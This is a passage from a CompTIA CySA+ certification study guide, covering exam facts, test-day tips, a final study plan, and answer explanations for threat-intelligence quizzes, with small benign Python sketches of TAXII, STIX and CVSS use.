9. Match the following terms with their definitions.

Terms | Definitions
Sherwood Applied Business Security Architecture (SABSA) | Comprehensive set of guidelines that address all phases of the software development life cycle
Information Technology Infrastructure Library (ITIL) | Provides a standard set of activities, general tasks, and a management structure to certify and accredit systems that maintain the information assurance and security posture of a system or site
Capability Maturity Model Integration (CMMI) | Enterprise security architecture framework that uses the six communication questions (What, Where, When, Why, Who, and How) that intersect with six layers (operational, component, physical, logical, conceptual, and contextual)
National Information Assurance Certification and Accreditation Process (NIACAP) | Process management development standard developed by the Office of Management and Budget in OMB Circular A-130
10. A(n) ______________________ policy is one intended to demonstrate a commitment to ethics in the activities of the principals.
Chapter 22
Final Preparation
The purpose of this chapter is to demystify the certification
preparation process for you. This includes taking a more
detailed look at the actual certification exam itself. This chapter
shares some helpful ideas on ensuring that you are ready for the
exam. Many people become anxious about taking exams, so this
chapter gives you the tools to build confidence for exam day.
The first 21 chapters of this book cover the technologies,
protocols, design concepts, and considerations required to be
prepared to pass the CompTIA Cybersecurity Analyst (CySA+)
CS0-002 exam. While these chapters supply the detailed
information, most people need more preparation than just
reading the first 21 chapters of this book. This chapter details a
set of tools and a study plan to help you complete your
preparation for the exam.
This short chapter has four main sections. The first section lists
the CompTIA CySA+ CS0-002 exam information and
breakdown. The second section shares some important tips to
keep in mind to ensure you are ready for this exam. The third
section discusses exam preparation tools useful at this point in
the study process. The final section of this chapter lists a
suggested study plan now that you have completed all the
earlier chapters in this book.
Note
Appendix C, “Memory Tables,” and Appendix D, “Memory Tables Answer Key,”
exist as soft-copy appendixes on the website for this book, which you can
access by going to https://www.pearsonITcertification.com/register, registering
your book, and entering this book’s ISBN: 9780136747161.
EXAM INFORMATION
Here are details you should be aware of regarding the exam that
maps to this text.
Exam code: CS0-002
Question types: Multiple-choice and performance-based
questions
Number of questions: Maximum of 85
Time limit: 165 minutes
Required passing score: 750 (on a scale of 100 to 900)
Exam fee (subject to change): $359.00 USD
Note
The following information is copied from the CompTIA CySA+ web page.
As attackers have learned to evade traditional signature-based
solutions, such as firewalls and anti-virus software, an
analytics-based approach within the IT security industry is
increasingly important for organizations. CompTIA CySA+
applies behavioral analytics to networks to improve the overall
state of security through identifying and combating malware
and advanced persistent threats (APTs), resulting in an
enhanced threat visibility across a broad attack surface. It will
validate an IT professional’s ability to proactively defend and
continuously improve the security of an organization. CySA+
will verify the successful candidate has the knowledge and skills
required to
Leverage intelligence and threat detection techniques
Analyze and interpret data
Identify and address vulnerabilities
Suggest preventative measures
Effectively respond to and recover from incidents
GETTING READY
Here are some important tips to keep in mind to ensure that
you are ready for this rewarding exam:
Note
Recently, CompTIA has expanded its online testing offerings to include the CySA+ exam. For information on this option, see https://www.comptia.org/testing/testing-options/take-online-exam.
Build and use a study tracker: Consider taking the exam
objectives and building a study tracker. This can be a notebook
outlining the objectives, with your notes written out. Using pencil
and paper can help concentration by making you take the time to
think about potential answers to questions that might be asked on
the exam for each objective. A study tracker will help ensure that
you have not missed anything and that you are confident for your
exam. Other options exist as well, including the sample Study Planner provided as a website supplement to this book (Appendix E). Whatever works best for you is the right option to use.
Think about your time budget for questions in the exam:
When you do the math, you realize that you have a bit less than 2
minutes per exam question. While this does not sound like enough
time, keep in mind that many of the questions will be very
straightforward, and you will take 15 to 30 seconds on those. This
builds time for other questions as you take your exam.
Watch the clock: Periodically check the time remaining as you
are taking the exam. You might even find that you can slow down
pretty dramatically if you have built up a nice block of extra time.
Consider earplugs: Some people are sensitive to noise when concentrating. If you are one of them, earplugs may help. There might be other test takers in the center with you, and you do not want to be distracted by them.
Plan your travel time: Give yourself extra time to find the center
and get checked in. Be sure to arrive early. As you test more at that
center, you can certainly start cutting it closer time-wise.
Get rest: Most students report success with getting plenty of rest
the night before the exam. All-night cram sessions are not typically
successful.
Bring in valuables but get ready to lock them up: The testing
center will take your phone, your smart watch, your wallet, and
other such items and will provide a secure place for them.
Use the restroom before going in: If you think you will need a
break during the test, clarify the rules with the test proctor.
Take your time getting settled: Once you are seated, take a
breath and organize your thoughts. Remind yourself that you have
worked hard for this opportunity and expect to do well. The 165-minute timer doesn't start until after a brief tutorial; it begins when you agree to see the first question.
Take notes: You will be given note-taking materials, so take
advantage of them. Sketch out lists and mnemonics that you
memorized. The note paper can be used for any calculations you
need, and it is okay to write notes to yourself before beginning.
Practice exam questions are great—so use them: This text
provides many practice exam questions. Be sure to go through them
thoroughly. Remember, you shouldn’t blindly memorize answers;
instead, let the questions really demonstrate where you are weak in
your knowledge and then study up on those areas.
TOOLS FOR FINAL PREPARATION
This section describes the available study tools and how to access them.
Pearson Test Prep Practice Test Software and Questions
on the Website
Register this book to get access to the Pearson Test Prep
practice test software (software that displays and grades a set of
exam-realistic, multiple-choice questions). Using the Pearson
Test Prep practice test software, you can either study by going
through the questions in Study mode or take a simulated
(timed) CySA+ exam.
The Pearson Test Prep practice test software comes with two
full practice exams. These practice tests are available to you
either online or as an offline Windows application. To access the
practice exams that were developed with this book, please see
the instructions in the card inserted in the sleeve in the back of
the book. This card includes a unique access code that enables
you to activate your exams in the Pearson Test Prep software.
You will find detailed instructions for accessing the Pearson
Test Prep software in the Introduction to this book.
Memory Tables
Like most exam Cert Guides, this book purposely organizes
information into tables and lists for easier study and review.
Rereading these tables and lists can be very useful before the
exam. However, it is easy to skim over the tables without paying
attention to every detail, especially when you remember having
seen the table’s contents when reading the chapter.
Instead of just reading the tables in the various chapters, this
book’s Appendixes C and D give you another review tool.
Appendix C lists partially completed versions of many of the
tables from the book. You can open Appendix C (a PDF
available on the book website after registering) and print the
appendix. For review, you can attempt to complete the tables.
This exercise can help you focus on the review. It also exercises
the memory connectors in your brain, and it prompts you to
think about the information from context clues, which forces a
little more contemplation about the facts.
Appendix D, also a PDF located on the book website, lists the
completed tables to check yourself. You can also just refer to the
tables as printed in the book.
Chapter-Ending Review Tools
Chapters 1 through 21 each have several features in the “Exam
Preparation Tasks” section at the end of the chapter. You might
have already worked through these in each chapter. It can also
be helpful to use these tools again as you make your final
preparations for the exam.
SUGGESTED PLAN FOR FINAL
REVIEW/STUDY
This section lists a suggested study plan to guide you until you take the CompTIA Cybersecurity Analyst (CySA+) CS0-002 exam. You can ignore this plan, use it as is, or just take suggestions from it.
The plan uses four steps:
Step 1. Review the key topics and the “Do I Know This
Already?” questions: You can use the table that lists
the key topics in each chapter, or just flip the pages
looking for key topics. Also, reviewing the DIKTA quiz
questions from the beginning of the chapter can be
helpful for review.
Step 2. Complete memory tables: Open Appendix C from
the book website and print the entire thing, or print
the tables by major part. Then complete the tables.
Step 3. Review the “Review Questions” sections: Go
through the review questions at the end of each
chapter to identify areas where you need more study.
Step 4. Use the Pearson Test Prep practice test
software to practice: You can use the Pearson Test
Prep practice test software to study by using a bank of
unique exam-realistic questions available only with
this book.
SUMMARY
The tools and suggestions listed in this chapter have been
designed with one goal in mind: to help you develop the skills
required to pass the CompTIA Cybersecurity Analyst (CySA+)
CS0-002 exam. This book has been developed from the
beginning to not just tell you the facts but also help you learn
how to apply them. No matter what your experience level
leading up to when you take the exam, it is my hope that the
broad range of preparation tools and the structure of the book
help you pass the exam with ease. I hope you do well on the
exam.
Appendix A
Answers to the “Do I Know
This Already?” Quizzes and
Review Questions
CHAPTER 1
Do I Know This Already?
1. D. Proprietary/closed-source intelligence sources are those
that are not publicly available and usually require a fee to
access. Examples of this are platforms maintained by private
organizations that supply constantly updating intelligence
information. In many cases this data is developed from all of
the provider’s customers and other sources.
2. A. Trusted Automated eXchange of Indicator Information (TAXII) is an application protocol for exchanging cyber threat intelligence (CTI) over HTTPS. It defines two primary services, Collections and Channels. (A minimal TAXII request sketch appears after this answer list.)
3. B. Because zero-day attacks occur before a fix or patch has
been released, it is difficult to prevent them. As with many
other attacks, keeping all software and firmware up to date
with the latest updates and patches is important.
4. C. Hacktivists are activists for a cause, such as animal
rights, that use hacking as a means to get their message out
and affect the businesses that they feel are detrimental to
their cause.
5. B. Collection is the stage in which most of the hard work
occurs. It is also the stage at which recent advances in
artificial intelligence (AI) and automation have changed the
game. It’s time-consuming work that involves web searches,
interviews, identifying sources, and monitoring, to name a
few activities.
6. B. Commodity malware is malware that is widely available
either for purchase or by free download. It is not customized
or tailored to a specific attack. It does not require complete
understanding of its processes and is used by a wide range of
threat actors with a range of skill levels.
7. A. In the healthcare community, where protection of patient
data is legally required by HIPAA, an example of a sharing
platform is H-ISAC (Health Information Sharing and
Analysis Center). It is a global operation focused on sharing
timely, actionable, and relevant information among its
members, including intelligence on threats, incidents, and
vulnerabilities.
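To make answer 2 concrete, here is a minimal sketch (not from the book) of how a client might query a TAXII 2.1 server's discovery endpoint over HTTPS with Python's requests library. The server URL and credentials are hypothetical placeholders; only the discovery path convention and the TAXII 2.1 media type come from the TAXII specification.

```python
# Hypothetical sketch: query a TAXII 2.1 discovery endpoint over HTTPS.
# The server URL and credentials below are illustrative placeholders.
import requests

DISCOVERY_URL = "https://taxii.example.com/taxii2/"  # placeholder server
HEADERS = {"Accept": "application/taxii+json;version=2.1"}  # TAXII 2.1 media type

resp = requests.get(DISCOVERY_URL, headers=HEADERS,
                    auth=("analyst", "secret"))  # placeholder credentials
resp.raise_for_status()
discovery = resp.json()

print(discovery.get("title"))
# Each API root can expose Collections from which CTI objects are pulled.
for api_root in discovery.get("api_roots", []):
    print("API root:", api_root)
```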
Review Questions
1. Possible answers can include the following:
Print and online media
Internet blogs and discussion groups
Unclassified government data
Academic and professional publications
Industry group data
2. Structured Threat Information eXpression (STIX). While STIX was originally sponsored by the Office of Cybersecurity and Communications within the U.S. Department of Homeland Security, it is now under the management of the
Organization for the Advancement of Structured
Information Standards (OASIS), a nonprofit consortium that
seeks to advance the development, convergence, and
adoption of open standards for the Internet.
3. STIX: An XML-based language that can be used to communicate cybersecurity data among those using the language (see the brief STIX 2.x sketch after these answers).
OpenIOC: An open framework that is designed for sharing
threat intelligence information in a machine-readable
format.
Cyber Intelligence Analytics Platform (CAP) v2.0:
Uses its proprietary artificial intelligence and machine
learning algorithms to help organizations unravel cyber risks
and threats and enables proactive cyber posture
management.
4. Insider. Insiders who are already inside the network
perimeter and already know the network are a critical
danger.
5. The models are as follows:
Hub and spoke: One central clearinghouse
Source/subscriber: One organization is the single source of
information
Peer-to-peer: Multiple organizations share their information
6. Hacktivists. Hacktivists are activists for a cause, such as animal rights, that use hacking as a means to get their message out and affect the businesses that they feel are detrimental to their causes.
7. Zero-day: Threat with no known solution
APT: Threat carried out over a long period of time
Terrorist: Hacks not for monetary gain but simply to
destroy or deface
8. Nation-state. Nation-state or state sponsors are usually
foreign governments. They are interested in pilfering data,
including intellectual property and research and
development data, from major manufacturers, tech
companies, government agencies, and defense contractors.
They have the most resources and are the best organized of
any of the threat actor groups.
9. Requirements. Before beginning intelligence activities,
security professionals must identify what the immediate
issue is and define as closely as possible the requirements of
the information that needs to be collected and analyzed. This
means the types of data to be sought are driven by what we
might fear the most or by recent breaches or issues. The
amount of potential information may be so vast that unless
we filter it to what is relevant, we may be unable to fully
understand what is occurring in the environment.
10. CISA. The Cybersecurity and Infrastructure Security Agency
(CISA) maintains a number of chartered organizations,
among them the Aviation Government Coordinating
Council.
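As a supplement to answer 3: STIX 1.x content is XML-based, while the current STIX 2.x releases express the same kind of data as JSON. The following is a minimal, hypothetical indicator sketch; the UUID and the documentation IP address are illustrative, not from the book.

```python
# Hypothetical sketch of a STIX 2.x indicator object, built as JSON.
# The UUID and the documentation IP address are illustrative only.
import json

indicator = {
    "type": "indicator",
    "spec_version": "2.1",
    "id": "indicator--d81f86b9-975b-4c0b-875e-810c5ad45a4f",
    "created": "2024-01-01T00:00:00.000Z",
    "modified": "2024-01-01T00:00:00.000Z",
    "name": "Known botnet C2 address",
    "pattern": "[ipv4-addr:value = '198.51.100.7']",
    "pattern_type": "stix",
    "valid_from": "2024-01-01T00:00:00.000Z",
}

print(json.dumps(indicator, indent=2))
```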
CHAPTER 2
Do I Know This Already?
1. C. MITRE ATT&CK is a knowledge base of adversary tactics
and techniques based on real-world observations. It is an
open system, and attack matrices based on it have been
created for various industries. It is designed as a foundation
for the development of specific threat models and
methodologies in the private sector, in government, and in
the cybersecurity product and service community.
2. A. Some threat intelligence data is generated from past
activities. Reputational scores may be generated for traffic
sourced from certain IP address ranges, domain names, and
URLs.
3. C. First, you must have a grasp of the capabilities of the
attacker or adversary. Threat actors have widely varying
capabilities. When carrying out threat modeling, you may
decide to develop a more comprehensive list of threat actors
to help in scenario development.
4. B. Security engineering is the process of architecting
security features into the design of a system or set of
systems. It has as its goal an emphasis on security from the
ground up, sometimes stated as “building in security.”
Unless the very latest threats are shared with this function,
engineers cannot be expected to build in features that
prevent threats from being realized.
Review Questions
1.
Corner | Description
Adversary | Describes the intent of the attack
Victim | Describes the target or targets
Capabilities | Describes attacker intrusion tools and techniques
Infrastructure | Describes the set of systems an attacker uses to launch attacks
2. Adversary. The adversary corner focuses on the intent of the attack.
3. Behavioral. Some threat intelligence data is based not on
reputation but on the behavior of the traffic in question.
Behavioral analysis is another term for anomaly analysis.
4. Indicator of compromise (IoC). An IoC is any activity,
artifact, or log entry that is typically associated with an
attack of some sort.
5. Examples include the following:
Virus signatures
Known malicious file types
Domain names of known botnet servers
An indicator of compromise (IoC) is any activity, artifact, or
log entry that is typically associated with an attack of some
sort.
6.
Acronym | Description
TLP | Set of designations used to ensure that sensitive information is shared with the appropriate audience
MITRE ATT&CK | Knowledge base of adversary tactics and techniques based on real-world observations
CVSS | System of ranking vulnerabilities that are discovered based on predefined metrics
IoC | Any activity, artifact, or log entry that is typically associated with an attack of some sort
7. PR:L stands for Privileges Required, where L stands for Low: the attacker requires privileges that provide basic user capabilities that could normally affect only settings and files owned by a user.
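To put PR:L in context, here is a small, hypothetical sketch (not from the book) that annotates each base metric in a sample CVSS v3.1 vector string. Under the v3.1 scoring formula, this particular vector yields a base score of 8.8 (High).

```python
# Hypothetical sketch: annotate the base metrics of a sample CVSS v3.1 vector.
# The vector itself is an illustrative example, not taken from the book.
vector = "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"

meanings = {
    "AV:N": "Attack Vector: Network",
    "AC:L": "Attack Complexity: Low",
    "PR:L": "Privileges Required: Low (basic user capabilities)",
    "UI:N": "User Interaction: None",
    "S:U": "Scope: Unchanged",
    "C:H": "Confidentiality impact: High",
    "I:H": "Integrity impact: High",
    "A:H": "Availability impact: High",
}

for metric in vector.split("/")[1:]:  # skip the "CVSS:3.1" prefix
    print(f"{metric:5} -> {meanings[metric]}")
```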